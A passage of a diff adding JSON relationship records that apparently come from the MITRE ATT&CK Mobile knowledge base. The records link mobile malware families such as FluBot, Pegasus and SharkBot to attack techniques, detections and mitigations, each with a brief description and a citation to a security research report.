"attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--e767fc9e-5211-4e7c-b628-5dd03a24af39", + "created": "2020-12-14T15:02:35.294Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Securelist Asacub", + "description": "T. Shishkova. (2018, August 28). The rise of mobile banker Asacub. Retrieved December 14, 2020.", + "url": "https://securelist.com/the-rise-of-mobile-banker-asacub/87591/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:32:42.890Z", + "description": "[Asacub](https://attack.mitre.org/software/S0540) can collect SMS messages as they are received.(Citation: Securelist Asacub)", + "relationship_type": "uses", + "source_ref": "malware--a76b837b-93cc-417d-bf28-c47a6a284fa4", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--a042d55c-b31e-41c1-9cd0-66070ec9a11d", + "type": "relationship", + "created": "2020-10-29T19:21:23.235Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "WeLiveSecurity AdDisplayAshas", + "url": "https://www.welivesecurity.com/2019/10/24/tracking-down-developer-android-adware/", + "description": "L. Stefanko. (2019, October 24). Tracking down the developer of Android adware affecting millions of users. Retrieved October 29, 2020." + } + ], + "modified": "2020-10-29T19:21:23.235Z", + "description": "[Android/AdDisplay.Ashas](https://attack.mitre.org/software/S0525) has hidden the C2 server address using base-64 encoding. (Citation: WeLiveSecurity AdDisplayAshas)", + "relationship_type": "uses", + "source_ref": "malware--f7e7b736-2cff-4c2a-9232-352cd383463a", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--fd5b3d4b-5d56-4d66-8b57-f858bc139901", + "type": "relationship", + "created": "2020-04-24T17:46:31.607Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SecurityIntelligence TrickMo", + "url": "https://securityintelligence.com/posts/trickbot-pushing-a-2fa-bypass-app-to-bank-customers-in-germany/", + "description": "P. Asinovsky. (2020, March 24). TrickBot Pushing a 2FA Bypass App to Bank Customers in Germany. Retrieved April 24, 2020." + } + ], + "modified": "2020-04-24T17:46:31.607Z", + "description": "[TrickMo](https://attack.mitre.org/software/S0427) contains obfuscated function, class, and variable names, and encrypts its shared preferences using Java’s `PBEWithMD5AndDES` algorithm.(Citation: SecurityIntelligence TrickMo)", + "relationship_type": "uses", + "source_ref": "malware--21170624-89db-4e99-bf27-58d26be07c3a", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--dd54e35c-d68b-4aa8-ad2a-acd4c76243c8", + "created": "2023-01-18T19:58:00.503Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "nccgroup_sharkbot_0322", + "description": "RIFT: Research and Intelligence Fusion Team. (2022, March 3). SharkBot: a “new” generation Android banking Trojan being distributed on Google Play Store. Retrieved January 18, 2023.", + "url": "https://research.nccgroup.com/2022/03/03/sharkbot-a-new-generation-android-banking-trojan-being-distributed-on-google-play-store/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T18:57:14.522Z", + "description": "[SharkBot](https://attack.mitre.org/software/S1055) can use RC4 to encrypt C2 payloads.(Citation: nccgroup_sharkbot_0322)", + "relationship_type": "uses", + "source_ref": "malware--9cd72f5c-bec0-4f7e-bb6d-296937116291", + "target_ref": "attack-pattern--bb4387ab-7a51-468b-bf5f-a9a8612f0303", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--ee095f20-eef5-4dcc-a537-70b387592c2c", + "created": "2023-02-28T20:38:46.702Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "bitdefender_flubot_0524", + "description": "Filip TRUȚĂ, Răzvan GOSA, Adrian Mihai GOZOB. (2022, May 24). New FluBot Campaign Sweeps through Europe Targeting Android and iOS Users Alike. Retrieved February 28, 2023.", + "url": "https://www.bitdefender.com/blog/labs/new-flubot-campaign-sweeps-through-europe-targeting-android-and-ios-users-alike/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-31T22:15:20.089Z", + "description": "[FluBot](https://attack.mitre.org/software/S1067) can use Accessibility Services to make removal of the malicious app difficult.(Citation: bitdefender_flubot_0524)", + "relationship_type": "uses", + "source_ref": "malware--f5ff006c-702f-4ded-8e60-ca6c540d91bc", + "target_ref": "attack-pattern--dc01774a-d1c1-45fb-b506-0a5d1d6593d9", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--5b87bb01-9587-42bd-aa6b-30158ca8f55f", + "type": "relationship", + "created": "2020-04-08T15:41:19.427Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Cofense Anubis", + "url": "https://cofense.com/infostealer-keylogger-ransomware-one-anubis-targets-250-android-applications/", + "description": "M. Feller. (2020, February 5). Infostealer, Keylogger, and Ransomware in One: Anubis Targets More than 250 Android Applications. Retrieved April 8, 2020." + } + ], + "modified": "2020-09-11T15:42:15.628Z", + "description": "[Anubis](https://attack.mitre.org/software/S0422) can send, receive, and delete SMS messages.(Citation: Cofense Anubis)", + "relationship_type": "uses", + "source_ref": "malware--a3c59d82-2c7c-44e5-a869-68e0a3e5935e", + "target_ref": "attack-pattern--b327a9c0-e709-495c-aa6e-00b042136e2b", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--abf03652-acd0-4361-8a66-f7e70e8e4376", + "created": "2020-06-02T14:32:31.913Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Volexity Insomnia", + "description": "A. Case, D. Lassalle, M. Meltzer, S. Koessel, et al.. (2020, April 21). Evil Eye Threat Actor Resurfaces with iOS Exploit and Updated Implant. Retrieved June 2, 2020.", + "url": "https://www.volexity.com/blog/2020/04/21/evil-eye-threat-actor-resurfaces-with-ios-exploit-and-updated-implant/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:12:12.766Z", + "description": "[INSOMNIA](https://attack.mitre.org/software/S0463) communicates with the C2 server using HTTPS requests.(Citation: Volexity Insomnia)", + "relationship_type": "uses", + "source_ref": "malware--21b7e0b0-0dea-4ccc-8ad4-8da51fe3a901", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--04ae1d87-1741-4cfd-84ff-3c5e46c0b112", + "created": "2022-04-05T19:59:03.285Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-05T19:59:03.285Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--fd211238-f767-4599-8c0d-9dca36624626", + "target_ref": "attack-pattern--2ccc3d39-9598-4d32-9657-42e1c7095d26", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--60ecd154-e907-419a-b41d-1a9a1f59e7c3", + "created": "2019-07-10T15:35:43.712Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Dark Caracal Jan 2018", + "description": "Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:36:27.557Z", + "description": "[Pallas](https://attack.mitre.org/software/S0399) has the ability to delete attacker-specified files from compromised devices.(Citation: Lookout Dark Caracal Jan 2018)", + "relationship_type": "uses", + "source_ref": "malware--c41a8b7c-3e42-4eee-b87d-ad8a100ee878", + "target_ref": "attack-pattern--ab7400b7-3476-4776-9545-ef3fa373de63", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--be27a303-5748-4b72-ba69-a328e2f6cc08", + "type": "relationship", + "created": "2020-12-31T18:25:05.177Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "CYBERWARCON CHEMISTGAMES", + "url": "https://www.youtube.com/watch?v=xoNSbm1aX_w", + "description": "B. Leonard, N. Mehta. (2019, November 21). The Secret Life of Sandworms. Retrieved December 31, 2020." + } + ], + "modified": "2020-12-31T18:25:05.177Z", + "description": "[CHEMISTGAMES](https://attack.mitre.org/software/S0555) can download new modules while running.(Citation: CYBERWARCON CHEMISTGAMES)", + "relationship_type": "uses", + "source_ref": "malware--a0d774e4-bafc-4292-8651-3ec899391341", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--4d542595-1eb0-45aa-9702-9d494142b390", + "type": "relationship", + "created": "2019-08-09T18:08:07.109Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603/", + "description": "Nikita Buchka and Alexey Firsh. (2018, January 16). Skygofree: Following in the footsteps of HackingTeam. Retrieved September 24, 2018.", + "source_name": "Kaspersky-Skygofree" + } + ], + "modified": "2019-08-09T18:08:07.109Z", + "description": "[Skygofree](https://attack.mitre.org/software/S0327) can record video or capture photos when an infected device is in a specified location.(Citation: Kaspersky-Skygofree)", + "relationship_type": "uses", + "source_ref": "malware--3a913bac-4fae-4d0e-bca8-cae452f1599b", + "target_ref": "attack-pattern--d8940e76-f9c1-4912-bea6-e21c251370b6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--8870c211-820a-46a1-96fc-02f4e6eaec03", + "type": "relationship", + "created": "2020-11-10T16:50:39.134Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2021-04-19T15:40:36.387Z", + "description": "[CarbonSteal](https://attack.mitre.org/software/S0529) has collected device network information, including 16-bit GSM Cell Identity, 16-bit Location Area Code, Mobile Country Code (MCC), and Mobile Network Code (MNC). [CarbonSteal](https://attack.mitre.org/software/S0529) has also called `netcfg` to get stats.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--007ebf84-4e14-44c7-a5aa-151d5de85320", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--57a5ae72-6932-45e6-83f2-609943902b35", + "created": "2023-03-20T18:50:33.248Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:50:33.248Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--d8ca4ea5-5242-4f0f-b3b7-008673f561ab", + "type": "relationship", + "created": "2020-09-11T16:22:03.229Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout ViperRAT", + "url": "https://blog.lookout.com/viperrat-mobile-apt", + "description": "M. Flossman. (2017, February 16). ViperRAT: The mobile APT targeting the Israeli Defense Force that should be on your radar. Retrieved September 11, 2020." + } + ], + "modified": "2020-09-11T16:22:03.229Z", + "description": "[ViperRAT](https://attack.mitre.org/software/S0506) can collect and record audio content.(Citation: Lookout ViperRAT)", + "relationship_type": "uses", + "source_ref": "malware--f666e17c-b290-43b3-8947-b96bd5148fbb", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--2e6d507e-afbb-4fa5-b459-2b060ab52db3", + "created": "2020-12-18T20:14:47.316Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "WhiteOps TERRACOTTA", + "description": "Satori Threat Intelligence and Research Team. (2020, August). TERRACOTTA Android Malware: A Technical Study. Retrieved December 18, 2020.", + "url": "https://www.whiteops.com/blog/terracotta-android-malware-a-technical-study" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:50:29.535Z", + "description": "[TERRACOTTA](https://attack.mitre.org/software/S0545) checks whether its call stack has been modified, an indication that it is running in an analysis environment, and if so, does not decrypt its obfuscated strings(Citation: WhiteOps TERRACOTTA).", + "relationship_type": "uses", + "source_ref": "malware--e296b110-46d3-4f7a-894c-cc71ea50168c", + "target_ref": "attack-pattern--6ffad4be-bfe0-424f-abde-4d9a84a800ad", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--d6e4fdc6-c936-4bb9-861f-fafd3b72fcb4", + "type": "relationship", + "created": "2021-02-17T20:43:52.413Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout FrozenCell", + "url": "https://blog.lookout.com/frozencell-mobile-threat", + "description": "Michael Flossman. (2017, October 5). FrozenCell: Multi-platform surveillance campaign against Palestinians. Retrieved November 11, 2020." + } + ], + "modified": "2021-02-17T20:43:52.413Z", + "description": "[FrozenCell](https://attack.mitre.org/software/S0577) has compressed and encrypted data before exfiltration using password protected .7z archives.(Citation: Lookout FrozenCell)", + "relationship_type": "uses", + "source_ref": "malware--96ea1e13-d50f-45f1-b0cf-4ac9bc5a2d62", + "target_ref": "attack-pattern--e3b936a4-6321-4172-9114-038a866362ec", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--4088b31b-d542-4935-84b4-82b592159591", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/hacking-team-rcsandroid-spying-tool-listens-to-calls-roots-devices-to-get-in/", + "description": "Veo Zhang. (2015, July 21). Hacking Team RCSAndroid Spying Tool Listens to Calls; Roots Devices to Get In. Retrieved December 22, 2016.", + "source_name": "TrendMicro-RCSAndroid" + } + ], + "modified": "2019-10-10T15:22:52.591Z", + "description": "[RCSAndroid](https://attack.mitre.org/software/S0295) can collect contacts and messages from popular applications, including Facebook Messenger, WhatsApp, Skype, Viber, Line, WeChat, Hangouts, Telegram, and BlackBerry Messenger.(Citation: TrendMicro-RCSAndroid)", + "relationship_type": "uses", + "source_ref": "malware--363bc05d-13cb-4e98-a5b7-e250f2bbdc2b", + "target_ref": "attack-pattern--702055ac-4e54-4ae9-9527-e23a38e0b160", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--3d24d88e-a0ab-42c6-8e8f-11f721082bba", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout-PegasusAndroid", + "description": "Mike Murray. (2017, April 3). Pegasus for Android: the other side of the story emerges. Retrieved April 16, 2017.", + "url": "https://blog.lookout.com/blog/2017/04/03/pegasus-android/" + } + ], + "modified": "2019-08-09T17:52:31.838Z", + "description": "[Pegasus for Android](https://attack.mitre.org/software/S0316) attempts to exploit well-known Android OS vulnerabilities to escalate privileges.(Citation: Lookout-PegasusAndroid)", + "relationship_type": "uses", + "source_ref": "malware--93799a9d-3537-43d8-b6f4-17215de1657c", + "target_ref": "attack-pattern--351c0927-2fc1-4a2c-ad84-cbbee7eb8172", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--96298aed-9e9f-4836-b29b-04c88e79e53e", + "created": "2022-04-01T18:42:37.987Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Security updates often contain patches for vulnerabilities that could be exploited for root access. Root access is often a requirement to impairing defenses.", + "modified": "2022-04-01T18:42:37.987Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--bcecd036-f40e-4916-9f8e-fd0ccf0ece8d", + "target_ref": "attack-pattern--20b0931a-8952-42ca-975f-775bad295f1a", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--1a2f6cdc-7c52-4f6e-9182-bc5b16a638dd", + "created": "2020-07-15T20:20:59.289Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Bitdefender Mandrake", + "description": "R. Gevers, M. Tivadar, R. Bleotu, A. M. Barbatei, et al.. (2020, May 14). Uprooting Mandrake: The Story of an Advanced Android Spyware Framework That Went Undetected for 4 Years. Retrieved July 15, 2020.", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/329/Bitdefender-PR-Whitepaper-Mandrake-creat4464-en-EN-interactive.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:49:47.110Z", + "description": "[Mandrake](https://attack.mitre.org/software/S0485) can evade automated analysis environments by requiring a CAPTCHA on launch that will prevent the application from running if not passed. It also checks for indications that it is running in an emulator.(Citation: Bitdefender Mandrake)", + "relationship_type": "uses", + "source_ref": "malware--52c994fa-b6c8-45a8-9586-a4275cf19307", + "target_ref": "attack-pattern--6ffad4be-bfe0-424f-abde-4d9a84a800ad", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--72a5350f-f0cf-4f44-82d5-28a25492c6af", + "type": "relationship", + "created": "2020-04-24T15:06:33.531Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "TrendMicro Coronavirus Updates", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/coronavirus-update-app-leads-to-project-spy-android-and-ios-spyware/", + "description": "T. Bao, J. Lu. (2020, April 14). Coronavirus Update App Leads to Project Spy Android and iOS Spyware. Retrieved April 24, 2020." + } + ], + "modified": "2020-04-24T17:55:55.049Z", + "description": "[Corona Updates](https://attack.mitre.org/software/S0425) can take pictures using the camera and can record MP4 files.(Citation: TrendMicro Coronavirus Updates)", + "relationship_type": "uses", + "source_ref": "malware--366c800f-97a8-48d5-b0a6-79d00198252a", + "target_ref": "attack-pattern--d8940e76-f9c1-4912-bea6-e21c251370b6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--626d4c6c-97e4-4aa3-922b-c1a81e677213", + "created": "2023-03-20T15:32:36.972Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T15:32:36.972Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--9558a84e-2d5e-4872-918e-d847494a8ffc", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--17141729-226d-40d4-928d-ffbd2eed7d11", + "created": "2022-04-05T19:37:16.086Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-05T19:37:16.086Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--9ef05e3d-52db-4c12-be4f-519214bbe91f", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--638f3d4b-f1d4-4c61-91a0-7c125ef8437a", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout-Pegasus", + "description": "Lookout. (2016). Technical Analysis of Pegasus Spyware. Retrieved December 12, 2016.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-technical-analysis.pdf" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "[Pegasus for iOS](https://attack.mitre.org/software/S0289) was distributed through a web site by exploiting vulnerabilities in the Safari web browser on iOS devices.(Citation: Lookout-Pegasus)", + "relationship_type": "uses", + "source_ref": "malware--33d9d91d-aad9-49d5-a516-220ce101ac8a", + "target_ref": "attack-pattern--fd339382-bfec-4bf0-8d47-1caedc9e7e57", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--eda3c5c4-d062-48d3-a78e-051f0c9d62f6", + "created": "2023-02-28T20:31:55.191Z", + "revoked": false, + "external_references": [ + { + "source_name": "proofpoint_flubot_0421", + "description": "Crista Giering, F. Naves, Andrew Conway, Adam McNeil . (2021, April 27). FluBot Android Malware Spreading Rapidly Through Europe, May Hit U.S. Soon. Retrieved February 28, 2023.", + "url": "https://www.proofpoint.com/us/blog/threat-insight/flubot-android-malware-spreading-rapidly-through-europe-may-hit-us-soon" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-02-28T20:31:55.191Z", + "description": "[FluBot](https://attack.mitre.org/software/S1067) can access app notifications.(Citation: proofpoint_flubot_0421)", + "relationship_type": "uses", + "source_ref": "malware--f5ff006c-702f-4ded-8e60-ca6c540d91bc", + "target_ref": "attack-pattern--39dd7871-f59b-495f-a9a5-3cb8cc50c9b2", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--d7ae7fb1-c363-4969-a4af-e2dd44a3c064", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout-PegasusAndroid", + "description": "Mike Murray. (2017, April 3). Pegasus for Android: the other side of the story emerges. Retrieved April 16, 2017.", + "url": "https://blog.lookout.com/blog/2017/04/03/pegasus-android/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T21:27:01.081Z", + "description": "[Pegasus for Android](https://attack.mitre.org/software/S0316) attempts to modify the device's system partition.(Citation: Lookout-PegasusAndroid)", + "relationship_type": "uses", + "source_ref": "malware--93799a9d-3537-43d8-b6f4-17215de1657c", + "target_ref": "attack-pattern--4f14e30b-8b57-4a7b-9093-2c0778ea99cf", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--f3599919-c4d1-4f2e-92d4-b34a04e33132", + "created": "2022-03-30T14:06:26.530Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Mobile security products can typically detect jailbroken or rooted devices. ", + "modified": "2022-03-30T14:06:26.530Z", + "relationship_type": "mitigates", + 